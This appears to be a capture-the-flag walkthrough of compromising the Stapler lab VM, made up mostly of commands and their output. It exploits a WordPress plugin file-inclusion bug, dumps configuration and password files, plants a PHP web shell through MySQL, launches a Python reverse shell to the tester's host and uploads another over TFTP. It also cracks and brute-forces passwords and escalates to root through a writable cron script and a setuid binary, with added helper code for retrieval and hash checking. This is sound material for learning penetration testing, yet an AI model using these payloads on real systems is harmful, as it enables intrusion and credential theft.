Information Gathering
I started with Nmap TCP and UDP scans to enumerate the services. The UDP scan shows DNS, NetBIOS and (probably) TFTP:

PORT     STATE         SERVICE     REASON              VERSION
53/udp   open          domain      udp-response ttl 64 dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
68/udp   open|filtered dhcpc       no-response
69/udp   open|filtered tftp        no-response
137/udp  open          netbios-ns  udp-response ttl 64 Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp  open|filtered netbios-dgm no-response
MAC Address: 08:00:27:BB:06:52 (Oracle VirtualBox virtual NIC)

The full TCP scan with version detection and default scripts:
nmap -vv -n -Pn -p- -sV -A 192.168.56.102

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-29 12:53 MDT
NSE: Loaded 138 scripts for scanning.
Host is up, received arp-response (0.00033s latency).
Scanned at 2016-08-29 12:53:12 MDT for 157s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE  SERVICE     REASON         VERSION
20/tcp    closed ftp-data    reset ttl 64
21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
137/tcp   closed netbios-ns  reset ttl 64
138/tcp   closed netbios-dgm reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?       syn-ack ttl 64
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, Support41Auth, SupportsCompression, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, IgnoreSigpipes, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: I)\x19f\x1CHS\j+2c\x1DnmS+y?c
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

Three things stand out: anonymous FTP, MySQL exposed to the network on 3306, and a second Apache instance on 12380. Port 666 is unidentified. The interesting content on 12380 turns out to be served over HTTPS.
Local Privilege
Local Privilege 1: HTTPS 12380
Since the HTTPS site on 12380 has no useful index page, I checked robots.txt:

https://192.168.56.102:12380/robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
admin112233 turns out to be unfinished, but blogblog is a WordPress installation. I ran wpscan against it to enumerate users and plugins.
wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 10 user/s:
    +----+---------+-----------------+
    | Id | Login   | Name            |
    +----+---------+-----------------+
    | 1  | john    | John Smith      |
    | 2  | elly    | Elly Jones      |
    | 3  | peter   | Peter Parker    |
    | 4  | barry   | Barry Atkins    |
    | 5  | heather | Heather Neville |
    | 6  | garry   | garry           |
    | 7  | harry   | harry           |
    | 8  | scott   | scott           |
    | 9  | kathy   | kathy           |
    | 10 | tim     | tim             |
    +----+---------+-----------------+

wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate ap

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
 |  Latest version: 1.0 (up to date)
 |  Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 |  Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
Exploit-DB lists a local file inclusion vulnerability for version 1.0 of advanced-video-embed-embed-videos-or-playlists: https://www.exploit-db.com/exploits/39646/. The exploit script is written for plain HTTP, so I downloaded it and patched it for HTTPS with a self-signed certificate by adding the following lines (they disable certificate verification for the urllib calls the script makes) and pointing url at the blog:
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.56.102:12380/blogblog"
The vulnerability let me pull both wp-config.php and /etc/passwd. The plugin saves the included file into the media library under a random id with an image extension, so after running the exploit I browsed the (listable) uploads directory, https://192.168.56.102:12380/blogblog/wp-content/uploads/, to find the new file. Opening it in the browser fails because the browser tries to render a configuration file as a JPEG, so I pulled the contents down with curl instead.
../wp-config.php:

define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');

../../../../etc/passwd:

root:x:0:0:root:/root:/bin/zsh
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
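As an added example (my code, not the post's and not the Exploit-DB script), here is the retrieval half of this step in Python 3. It builds an explicit unverified TLS context instead of monkey-patching ssl (defensible only because the lab host presents a self-signed certificate), snapshots the listable uploads directory before and after the exploit runs so the new attachment stands out from the legitimate media, downloads it, and parses the DB_* defines out of wp-config.php. The base URL, the Apache autoindex link format and the regexes are assumptions; the exploit script itself is still run separately.

```python
import re
import ssl
import urllib.request
from urllib.parse import urljoin

# Assumed lab target from the post; adjust for your own box.
BASE = "https://192.168.56.102:12380/blogblog/"
UPLOADS = urljoin(BASE, "wp-content/uploads/")


def lab_ssl_context() -> ssl.SSLContext:
    """TLS context with verification off. Only defensible against a lab
    host with a self-signed certificate; never reuse it anywhere else."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch(url: str, ctx: ssl.SSLContext) -> str:
    """GET a URL and return its body as text (undecodable bytes replaced)."""
    with urllib.request.urlopen(url, context=ctx, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


# Assumption: Apache autoindex emits <a href="name">, and the plugin stores
# the included file under a random numeric name with an image extension.
_IMAGE_HREF = re.compile(r'href="([^"?/][^"]*\.(?:jpe?g|png|gif))"', re.I)


def image_names(listing_html: str) -> set:
    """Image-named entries in a directory listing page."""
    return set(_IMAGE_HREF.findall(listing_html))


def new_uploads(before_html: str, after_html: str) -> list:
    """Entries present after the exploit ran that were absent before."""
    return sorted(image_names(after_html) - image_names(before_html))


# wp-config.php lines look like: define('DB_USER', 'root');
_DEFINE = re.compile(r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_config(text: str) -> dict:
    """Return the DB_* constants from wp-config.php text. A password that
    itself contains a quote character would need a real PHP parser."""
    return {k: v for k, v in _DEFINE.findall(text) if k.startswith("DB_")}


def retrieve_included_file(before_html: str, ctx: ssl.SSLContext) -> str:
    """After the exploit ran: diff the listing against the earlier snapshot
    and download the single new attachment."""
    added = new_uploads(before_html, fetch(UPLOADS, ctx))
    if len(added) != 1:
        raise RuntimeError(f"expected exactly one new upload, found {added}")
    return fetch(urljoin(UPLOADS, added[0]), ctx)


if __name__ == "__main__":
    ctx = lab_ssl_context()
    before = fetch(UPLOADS, ctx)
    input("snapshot taken; run the LFI exploit now, then press Enter ")
    body = retrieve_included_file(before, ctx)
    print(body)
    print(parse_wp_config(body))
```

Diffing two listings is more reliable than guessing which numeric name is yours when the uploads directory already holds media.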
With the database root password from wp-config.php you can enumerate the database and drop a web shell, either through phpMyAdmin or directly over MySQL, which is exposed on 3306/tcp. I chose the direct MySQL connection. Writing a file with SELECT ... INTO OUTFILE needs the FILE privilege (root has it), a secure_file_priv setting that does not restrict the target directory (check with SHOW VARIABLES LIKE 'secure_file_priv';), and a directory the mysqld process can write to. The resulting file is owned by mysql, so the web server only needs read access to it.
mysql -u root -p -h 192.168.56.102

mysql> show databases;
mysql> use wordpress;
mysql> show tables;
mysql> Select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+

mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)
The web shell is then reachable with curl (-k because of the self-signed certificate):
curl -k 'https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig'

enp0s3    Link encap:Ethernet  HWaddr 08:00:27:bb:06:52
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:343006 errors:0 dropped:0 overruns:0 frame:0
          TX packets:154479 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:46270812 (46.2 MB)  TX bytes:56110368 (56.1 MB)
          Interrupt:10 Base address:0xd000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:180 errors:0 dropped:0 overruns:0 frame:0
          TX packets:180 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:24245 (24.2 KB)  TX bytes:24245 (24.2 KB)
A web shell is clumsy to work with, so I used it to launch a Python reverse shell back to a listener on my machine (192.168.56.101:443), then ran Python again inside that shell to get a proper TTY.
https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty;pty.spawn("/bin/bash")'
There are other things you can enumerate such as:
I wrote the wp_users rows out as user:hash lines and ran John the Ripper against them with a wordlist.
john stapler.wpusers

Elly:ylle
garry:football
harry:monkey
scott:cookie
tim:thumb
Simon:TOM
6 password hashes cracked, 10 left
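These are phpass "portable" hashes (the $P$ prefix), which John handles with --format=phpass. As an added example that is not from the post, here is a Python 3 reimplementation of the phpass portable algorithm, following the published phpass reference, so you can verify a cracked candidate against a stored hash (or produce a hash for a known password) without PHP or WordPress, plus a helper that writes wp_users rows in the user:hash form John expects. The two sample rows are copied from the dump above; everything else is mine.

```python
import hashlib
import hmac
import secrets

# phpass's own alphabet; this is not RFC 4648 base64.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass encode64: 3 bytes -> 4 chars, least-significant 6 bits first."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass hash: MD5(salt+pw), then 2**count_log2 rounds of
    MD5(prev+pw). `setting` is the first 12 chars of a hash:
    '$P$' + one count character + an 8-character salt."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("truncated salt")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate against a stored hash."""
    return hmac.compare_digest(phpass_crypt(password, stored[:12]), stored)


def hash_password(password: str, count_log2: int = 13, salt: str = None) -> str:
    """Create a new hash. WordPress uses count_log2 = 13, hence the '$P$B'."""
    if salt is None:
        salt = _encode64(secrets.token_bytes(6), 6)  # 6 random bytes -> 8 chars
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def to_john_input(rows) -> str:
    """(user_login, user_pass) rows -> user:hash lines for
    john --format=phpass stapler.wpusers"""
    return "".join(f"{user}:{h}\n" for user, h in rows)


# Constructed sample: two rows copied from the wp_users dump above.
SAMPLE_ROWS = [
    ("Elly", "$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0"),
    ("tim", "$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0"),
]

if __name__ == "__main__":
    print(to_john_input(SAMPLE_ROWS), end="")
    # Confirm John's result for Elly against the stored hash.
    print("Elly:ylle ->", check_password("ylle", SAMPLE_ROWS[0][1]))
```

The iteration count is encoded in the fourth character, so a hash beginning "$P$B" costs 2^13 MD5 calls per guess; that is why the remaining ten hashes resist a quick wordlist run.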
Local Privilege 2: Bruteforce
I was able to enumerate users for a brute-force three ways: from service banners, over SMB, and over FTP.

Banner User Enumeration
This one is self-explanatory: the service banners and page content name employees, which gives me usernames to brute-force.

FTP: Harry, Elly, John
SSH: Barry
SMB: Kathy, Fred
HTTPS: Tim
SMB User Enumeration
The Samba server allows anonymous enumeration, so enum4linux lists the local Unix users and their SIDs, ready to feed into a brute-force:
enum4linux 192.168.56.102

S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
FTP User Enumeration
Anonymous FTP login is allowed, and both the banner and a note left on the server name users:

21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

root@kali:~/Downloads# ftp 192.168.56.102
Connected to 192.168.56.102.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.56.102:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (50.1884 kB/s)
ftp> ^C
ftp> 221 Goodbye.
root@kali:~/Downloads# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
The Attack
With the three names from the FTP banner and note in users.txt, hydra's -e nsr options (empty password, password equal to the login, and the login reversed) are enough to find elly's FTP password:

root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:33:53
[DATA] max 9 tasks per 1 server, overall 64 tasks, 9 login tries (l:3/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.56.102   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:33:57
Logged in over FTP as elly, I can pull down several sensitive files: her session lands in a directory holding passwd, vsftpd.conf and ftpusers (shadow is refused). The most useful is passwd, since its usernames feed an SSH brute-force with the same -e nsr options. That gives me a local shell as SHayslett, whose password is the username.
root@kali:~/Downloads# ftp 192.168.56.102
Connected to 192.168.56.102.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.56.102:root): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2942 bytes).
226 Transfer complete.
2942 bytes received in 0.00 secs (35.0714 MB/s)
ftp> get shadow
local: shadow remote: shadow
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> get vsftpd.conf
local: vsftpd.conf remote: vsftpd.conf
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for vsftpd.conf (5961 bytes).
226 Transfer complete.
5961 bytes received in 0.00 secs (50.3084 MB/s)
ftp> get ftpusers
local: ftpusers remote: ftpusers
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftpusers (132 bytes).
226 Transfer complete.
132 bytes received in 0.00 secs (1.6564 MB/s)
ftp> 221 Goodbye.
root@kali:~/Downloads# cat passwd
root:x:0:0:root:/root:/bin/zsh
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash

root@kali:~/Downloads# awk -F':' '{ print $1}' passwd > users.txt
root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:44:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.102   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:45:13
Local Privilege 3: TFTP
I can also go through TFTP, which needs no authentication, and upload my PHP reverse shell straight into the document root of the web server on port 80. TFTP has no directory listing (ls is not even a command), so you have to know or guess the path. The transfer below ran in netascii mode, which is fine for a text payload; for anything binary switch to binary (octet) mode first.

root@kali:/var/www# tftp 192.168.56.102
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
putting shell.php to 192.168.56.102:shell.php [netascii]
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
tftp>
I set up a listener and, once the web server executes the file and the shell connects back (as www, the user the port-80 server runs as), I get a TTY with Python.
root@kali:~/Downloads# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49622
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 18:05:58 up  4:15,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
JKanode  pts/2    192.168.56.101   16:04    1:36m  0.08s  0.11s sshd: JKanode [priv]
uid=1028(www) gid=1028(www) groups=1028(www)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www@red:/$
Privilege Escalation
Privilege Escalation 1: Bash History
From the www-data shell I used find to print every readable .bash_history under /home. One user's history contains sshpass commands with plaintext passwords for two accounts, JKanode and peter:

www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
...
id
cat: ./peter/.bash_history: Permission denied
find: './peter/.cache': Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
...
Logging in as peter over SSH with that password, sudo -l shows that peter may run any command as root. I changed his login shell from zsh to bash (personal preference) and then used sudo -i to read flag.txt in /root.
ssh peter@192.168.56.102
red% sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red% sudo usermod -s /bin/bash peter
peter@red:~$ sudo -i
➜  ~ cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
[ASCII-art trophy omitted]
Privilege Escalation 2: SUID
Once I have a local shell (here the JKanode SSH session, using the password from the bash history), I look for escalation paths with Linux Priv Checker, available at http://www.securitysift.com/download/linuxprivchecker.py. Among the world-writable files it lists is a root-owned script in /usr/local/sbin, cron-logrotate.sh, whose name says it is run by cron:

python linuxprivchecker.py > linuxpriv.txt
less linuxpriv.txt

[+] World Writable Files
    -rw-rw-rw- 1 mysql mysql 39 Aug 29 15:24 /var/www/https/blogblog/wp-content/uploads/shell.php
    -rwxrwxrwx 1 www www 0 Jun 3 14:48 /etc/authbind/byport/80
    -rwxrwxrwx 1 root root 51 Jun 3 20:41 /usr/local/sbin/cron-logrotate.sh

JKanode@red:/tmp$ cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
Because cron runs that script as root, I can replace its contents with commands that make a binary of mine root-owned and setuid. The order matters: chown first, then chmod, because chown clears the setuid bit. I then compile a small program that calls setuid(0) and setgid(0) and launches bash, wait for cron to fire, and execute it for a root shell. The gcc warning about system() only means the source lacks #include <stdlib.h>; it is harmless here.
JKanode@red:/tmp$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh
JKanode@red:/tmp$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
JKanode@red:/tmp$ gcc setuid.c -o setuid
setuid.c: In function ‘main’:
setuid.c:8:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
  system("/bin/bash");
JKanode@red:/tmp$ ./setuid
root@red:/tmp# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
[ASCII-art trophy omitted]
b6b545dc11b7a270f4bad23432190c75162c4a2b
